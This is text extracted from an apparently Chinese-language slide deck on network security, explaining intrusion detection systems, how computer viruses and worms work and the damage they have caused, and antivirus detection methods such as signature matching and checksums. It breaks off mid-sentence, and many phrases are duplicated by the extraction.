7/21/20247/21/2024实时入侵检测系统实时入侵检测系统Internet 总部总部总部总部办事处办事处办事处办事处分公司分公司分公司分公司分公司分公司分公司分公司在网络中部署网络入侵检在网络中部署网络入侵检测系统,实时对网络中的测系统,实时对网络中的数据流进行检测,对于可数据流进行检测,对于可疑的数据,将及时报警,疑的数据,将及时报警,入侵检测系统同时与防火入侵检测系统同时与防火墙交互信息,共同防范来墙交互信息,共同防范来自于网外的攻击。自于网外的攻击。具体策略如下:具体策略如下:基于网络的入侵检测策略基于网络的入侵检测策略基于主机的入侵检测策略基于主机的入侵检测策略报警报警攻击攻击7/21/20247/21/2024什么是入侵检测什么是入侵检测系统系统IDSIDS(Intrusion Detection SystemIntrusion Detection System)就是入就是入侵检测系统,它通过抓取网络上的所有报文,侵检测系统,它通过抓取网络上的所有报文,分析处理后,报告异常和重要的数据模式和行分析处理后,报告异常和重要的数据模式和行为模式,使网络安全管理员清楚地了解网络上为模式,使网络安全管理员清楚地了解网络上发生的事件,并能够采取行动阻止可能的破坏。发生的事件,并能够采取行动阻止可能的破坏。7/21/20247/21/2024什么是入侵检测系统入侵检测系统网络数据包的获取混杂模式网络数据包的解码协议分析网络数据包的检查规则匹配网络数据包的统计异常检测网络数据包的审查事件生成7/21/20247/21/2024监控室监控室=控制中心控制中心后门后门保安保安=防火墙防火墙摄像机摄像机=探测引擎探测引擎Card KeyCard Key形象地说,它就是网络摄象机,能够捕获并记录网络上的所有数据,同时它也是智能摄象机,能够分析网络数据并提炼出可疑的、异常的网络数据,它还是X光摄象机,能够穿透一些巧妙的伪装,抓住实际的内容。它还不仅仅只是摄象机,还包括保安员的摄象机,能够对入侵行为自动地进行反击:阻断连接、关闭道路(与防火墙联动)。什么是入侵检测系统什么是入侵检测系统7/21/20247/21/2024在安全体系中,在安全体系中,IDSIDS是唯一一个通过数据和行为模式判断是唯一一个通过数据和行为模式判断其是否有效的系统,如下图所示,防火墙就象一道门,它其是否有效的系统,如下图所示,防火墙就象一道门,它可以阻止一类人群的进入,但无法阻止同一类人群中的破可以阻止一类人群的进入,但无法阻止同一类人群中的破坏分子,也不能阻止内部的破坏分子;访问控制系统可以坏分子,也不能阻止内部的破坏分子;访问控制系统可以不让低级权限的人做越权工作,但无法保证高级权限的做不让低级权限的人做越权工作,但无法保证高级权限的做破坏工作,也无法保证低级权限的人通过非法行为获得高破坏工作,也无法保证低级权限的人通过非法行为获得高级权限级权限 入侵检测系统的作用入侵检测系统的作用7/21/20247/21/2024入侵检测系统的职责入侵检测系统的职责IDS系统的两大职责:实时检测和安全审计。实时监测实时地监视、分析网络中所有的数据报文,发现并实时处理所捕获的数据报文;安全审计通过对IDS系统记录的网络事件进行统计分析,发现其中的异常现象,得出系统的安全状态,找出所需要的证据。7/21/20247/21/2024IntranetIntranetIDS AgentIDS Agent网络IDS企业内部典型安装FirewallFirewallServersDMZDMZIDS Agent监控中心监控中心router7/21/20247/21/2024IDS阻断入侵示意图 Firewall FirewallServersDMZDMZIDS AgentIntranetIntranetIDS Agent监控中心监控中心router攻击者攻击者攻击者攻击者发现攻击发现攻击发现攻击发现攻击发现攻击发现攻击报警报警报警报警7/21/20247/21/2024防病毒技术防病毒技术防病毒技术防病毒技术病毒概述病毒危害病毒新技术防病毒技术清除病毒网络防病毒7/21/20247/21/2024病毒概述病毒概述中华人民共和国计算机信息系统安全保护条例第二十八条中明确指出:“计算机病毒计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我传染的一组计算机指令或者程序代码。”7/21/20247/21/2024计算机病毒原理计算机病毒程序病毒引导模块(潜伏机制)病毒传染模块(再生机制)病毒表现模块(激发机制)7/21/20247/21/2024计算机病毒的工作流程一次非授权的加载,病毒进入内存病毒引导模块被执行修改系统参数,引人传染和表现模块监视系统运行判断传染条件是否满足?判断触发条件是否满足?进行传染进行表现或破坏7/21/20247/21/2024病毒的特征依附性传染性潜伏性可触发性破坏性针对性人为性7/21/20247/21/2024病毒的征兆磁盘文件数目增多系统的RAM空间变小文件的日期时间值被改变可执行程序长度增加磁盘上出现坏簇程序加载时间比平时变长程序执行时间较平时变长硬盘读写时间明显增加硬盘启动系统失败7/21/20247/21/2024防病毒技术防病毒技术防病毒技术防病毒技术病毒概述病毒概述病毒危害病毒危害病毒新技术病毒新技术防病毒技术防病毒技术消毒病毒消毒病毒网络防病毒网络防病毒 7/21/20247/21/2024计算机病毒的危害性磁盘文件数目增多影响系统效率删除、破坏数据干扰正常操作阻塞网络进行反动宣传占用系统资源被后门控制7/21/20247/21/2024最新病毒分析CIH病毒Loveletter病毒首例病毒与蠕虫相结合Sircam首例蠕虫与黑客相结合CodeRedIINimda病毒7/21/20247/21/2024病毒新技术和发展趋势隐藏型病毒自加密、多形态及变异病毒反向病毒邮件型病毒JAVA和ActiveX病毒智能化病毒形式多样化传播方式多样化专用病毒生成工具7/21/20247/21/2024蠕虫7/21/20247/21/2024蠕虫病毒的特点蠕虫也是一种病毒,因此具有病毒的共同特征。普通病毒需要的寄生普通病毒需要的寄生,通过自己指令的执行通过自己指令的执行,将自己,将自己的指令代码写到其他程序的体内,而被的指令代码写到其他程序的体内,而被感染的文件就感染的文件就被称为被称为”宿主宿主”病毒主要是感染文件病毒主要是感染文件,当然也还有像,当然也还有像DIRII这种链接这种链接型病毒,还有引导区病毒。引导区病毒他是感染磁盘型病毒,还有引导区病毒。引导区病毒他是感染磁盘的引导区,如果是软盘被感染,这张软盘用在其他机的引导区,如果是软盘被感染,这张软盘用在其他机器上后,同样也会感染其他机器,所以传播方式也是器上后,同样也会感染其他机器,所以传播方式也是用软盘等方式。用软盘等方式。7/21/20247/21/20242001年红色代码大爆发7/21/20247/21/2024蠕虫病毒的罪恶病毒名称持续时间造成损失莫里斯蠕虫1988年6000多台计算机停机,直接经济损失达9600万美元美丽杀手1999年3月政府部门和一些大公司紧急关闭了网络服务器,经济损失超过12亿美元爱虫病毒2000年5月至今众多用户电脑被感染,损失超过100亿美元以上红色代码2001年7月网络瘫痪,直接经济损失超过26亿美元求职信2001年12月至今大量病毒邮件堵塞服务器,损失达数百亿美元Sql蠕虫王2003年1月网络大面积瘫痪,银行自动提款机运做中断,直接经济损失超过26亿美元7/21/20247/21/2024防病毒技术特征代码法 校验和法 行为监测法启发式扫描虚拟机技术7/21/20247/21/2024特征代码法的实现步骤特征代码法的实现步骤采集已知病毒样本,病毒如果即感染COM文件,又感染EXE文件,要两者都采样病毒采样中,抽取特征代码,应依据如下原则:抽取的代码比较特殊,不大可能与普通正常程序代码吻合。抽取的代码要有适当长度,一方面维持特征代码的唯一性,另一方面又不要有太大的空间与时间的开 销 在既感染COM文件又感染EXE文件的病毒样本中,要抽取两种样本共有的代码并将特征代码纳入病毒数据库 打开被检测文件,在文件中搜索,检查文件中是否含有病毒数据库中的病毒特征代码。如果发现病毒特征代码,由于特征代码与病毒一一对应,便可以断定,被查文件中患有何种病毒。7/21/20247/21/2024特征代码法的特点优点优点:检测准确、快速可识别病毒的名称误报警率低依据检测结果,可做杀毒处理缺点:缺点:不能检测未知病毒搜集已知病毒的特征代码,费用开销大在网络上效率低。7/21/20247/21/2024校验和法查病毒采用三种方式校验和法查病毒采用三种方式在检测病毒工具中纳入校验和法,对被查的对象文件计算其正常状态的校验和,将校验和值写入被查文件中或检测工具中,而后进行比较。在应用程序中,放入校验和法自我检查功能,将文件正常状态的 校验和写入文件本身中,每当应用程序启动时,比较现行校验和与原校验和值。实现应用程序的自检测。将校验和检查程序常驻内存,每当应用程序开始运行时,自动比 较检查应用程序内部或别的文
展开阅读全文